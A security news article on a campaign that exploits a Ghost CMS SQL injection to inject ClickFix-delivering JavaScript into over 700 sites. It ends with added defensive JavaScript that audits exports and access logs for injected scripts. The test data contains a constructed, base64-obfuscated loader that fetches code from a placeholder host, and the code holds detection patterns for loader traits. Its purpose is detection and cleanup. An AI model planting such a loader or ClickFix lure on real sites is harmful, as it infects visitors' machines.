
A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript that triggers ClickFix attack flows.
The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security websites, and personal blogs.
According to the researchers, the threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.

Source: XLab
CVE-2026-26980 affects Ghost 3.24.0 through 6.19.0 and allows unauthenticated attackers to read arbitrary data from the site database, including the admin API keys.
An admin API key gives management access to users, posts, and themes, and can be used to modify article pages.
Although the fix was released on February 19 in Ghost CMS version 6.19.1, many sites failed to install the security update.
On February 27, SentinelOne published details of CVE-2026-26980 being exploited in attacks and of how such incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, sometimes re-infecting the same domains with different scripts after cleanup, or one cluster removing the other's script to inject its own.

Source: XLab
Attack chain
The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, then use the resulting elevated rights to inject malicious JavaScript into articles.
The injected JavaScript is a lightweight loader that fetches second-stage code from the attacker's infrastructure. That second stage is primarily a cloaking script that fingerprints visitors to determine whether they qualify as targets.
Visitors who pass the check are served a fake Cloudflare prompt, loaded via an iframe on top of the article page, which contains the ClickFix lure.

Source: XLab
The page instructs victims to "verify that they are human" by pasting a supplied command into their Windows command prompt, which drops a payload on their system.
XLab has observed multiple payloads used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.
Source: XLab
Mitigating the threat
The most important action for Ghost CMS site administrators is to upgrade to version 6.19.1 or later and rotate all keys that were in use before the upgrade, as they may have been exposed. Because the flaw allows reading arbitrary data from the database, any secret stored there should be treated as potentially exposed, not only the admin API keys.
XLab provided a list of indicators of compromise (IoCs), including the injected scripts, so a thorough review of affected websites is needed to locate and remove them.
The researchers recommend that site owners keep a 30-day record of admin API call logs to allow a reliable retrospective investigation.
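As an added example (my own code, not XLab's, SentinelOne's or Ghost's), the two review steps above in JavaScript: an audit of a Ghost JSON export for script tags in post HTML and in the per-post and site-wide code-injection fields, and a pass over web-server access logs that flags write calls to the Admin API posts endpoint so each one can be matched to a known editor action. It assumes Ghost's export layout (`db[0].data.posts` and `db[0].data.settings`), the `/ghost/api/admin/` path of Ghost's Admin API, an allowlist of first-party script hosts, and constructed sample data; the inline-script patterns are generic loader traits, not the campaign's IoCs, and `cdn.example.net` / `static.example.net` are placeholders.

```javascript
// Added example: audit a Ghost JSON export for injected <script> tags and
// review access logs for Admin API writes. Not XLab/SentinelOne/Ghost code.
// Assumptions: Ghost export layout {db:[{data:{posts,settings}}]}; Admin API
// posts endpoint under /ghost/api/admin/ (v3/v4 prefixes also accepted);
// first-party script hosts listed in ALLOWED_HOSTS; sample data is constructed.

// Hosts that legitimately serve scripts on this site (assumption).
const ALLOWED_HOSTS = new Set(['example.com', 'www.example.com']);

// Generic loader traits for inline scripts; not the campaign's actual IoCs.
const SUSPICIOUS_INLINE = [
  /document\.createElement\(\s*['"]script['"]\s*\)/i,
  /\batob\s*\(/,
  /String\.fromCharCode\s*\(/,
  /\beval\s*\(/,
];

const SCRIPT_TAG = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_ATTR = /\bsrc\s*=\s*["']([^"']+)["']/i;

// Return findings for one HTML or code-injection field. External script
// hosts outside the allowlist and loader-like inline bodies are reported.
function scanHtml(html, allowedHosts, where) {
  const findings = [];
  if (!html) return findings;
  for (const m of html.matchAll(SCRIPT_TAG)) {
    const [, attrs, body] = m;
    const src = attrs.match(SRC_ATTR);
    if (src) {
      let host;
      // Resolve relative and protocol-relative URLs against the site origin.
      try { host = new URL(src[1], 'https://example.com/').hostname; } catch { host = '(unparseable)'; }
      if (!allowedHosts.has(host)) findings.push({ where, kind: 'external-script', detail: src[1] });
    } else if (SUSPICIOUS_INLINE.some((re) => re.test(body))) {
      findings.push({ where, kind: 'suspicious-inline', detail: body.trim().slice(0, 80) });
    }
  }
  return findings;
}

// Walk every post's html and per-post code injection, plus the site-wide
// code injection settings, which an Admin API key can also edit.
function auditExport(exportJson, allowedHosts = ALLOWED_HOSTS) {
  const data = exportJson.db[0].data;
  const findings = [];
  for (const p of data.posts || []) {
    for (const field of ['html', 'codeinjection_head', 'codeinjection_foot']) {
      findings.push(...scanHtml(p[field], allowedHosts, `post:${p.slug}.${field}`));
    }
  }
  for (const s of data.settings || []) {
    if (s.key === 'codeinjection_head' || s.key === 'codeinjection_foot') {
      findings.push(...scanHtml(s.value, allowedHosts, `settings.${s.key}`));
    }
  }
  return findings;
}

// Combined-format access log: flag write methods against the Admin API posts
// endpoint so each one can be checked against the editors' own activity.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;
const ADMIN_POST_WRITE = /^\/ghost\/api\/(?:v\d\/)?admin\/posts\//;

function adminPostWrites(logText) {
  const hits = [];
  for (const line of logText.split('\n')) {
    const m = line.match(LOG_RE);
    if (!m) continue;
    const [, ip, ts, method, path, status] = m;
    if (['POST', 'PUT', 'DELETE'].includes(method) && ADMIN_POST_WRITE.test(path)) {
      hits.push({ ip, ts, method, path, status: Number(status) });
    }
  }
  return hits;
}

// Constructed sample data (not from any real site).
const SAMPLE_EXPORT = { db: [{ data: {
  posts: [
    { slug: 'welcome', html: '<p>Hello</p><script src="/assets/site.js"></script>',
      codeinjection_head: null, codeinjection_foot: null },
    { slug: 'news',
      html: '<p>Update</p><script>var s=document.createElement("script");'
          + 's.src=atob("aHR0cHM6Ly9jZG4uZXhhbXBsZS5uZXQvbG9hZC5qcw==");'
          + 'document.head.appendChild(s);</script>',
      codeinjection_head: '<script src="//static.example.net/t.js"></script>',
      codeinjection_foot: '' },
  ],
  settings: [
    { key: 'title', value: 'My Blog' },
    { key: 'codeinjection_foot', value: '<script src="https://www.example.com/analytics.js"></script>' },
  ],
} }] };

const SAMPLE_LOG = [
  '203.0.113.7 - - [20/Feb/2026:03:14:07 +0000] "GET /ghost/api/admin/posts/?limit=all HTTP/1.1" 200 5120',
  '203.0.113.7 - - [20/Feb/2026:03:14:09 +0000] "PUT /ghost/api/admin/posts/64f1a2b3c4d5e6f708091a0b/ HTTP/1.1" 200 2210',
  '198.51.100.4 - - [20/Feb/2026:08:02:11 +0000] "GET /news/ HTTP/1.1" 200 9804',
  '198.51.100.4 - - [20/Feb/2026:08:02:12 +0000] "GET /ghost/api/content/posts/?key=abc HTTP/1.1" 200 3001',
].join('\n');

console.log(auditExport(SAMPLE_EXPORT));
console.log(adminPostWrites(SAMPLE_LOG));
```

On the sample data this reports two findings, both on the `news` post: the inline loader in its HTML and the external script in its `codeinjection_head`, while the first-party scripts pass. The single flagged log entry is the `PUT` to the posts endpoint; a read of the full post list followed by a write from the same address is the shape a key-based content edit leaves behind, which is why a 30-day retention of these calls is worth keeping. Run it against a real export (Settings > Labs > Export) by replacing `SAMPLE_EXPORT` with the parsed file and `ALLOWED_HOSTS` with the site's actual script origins.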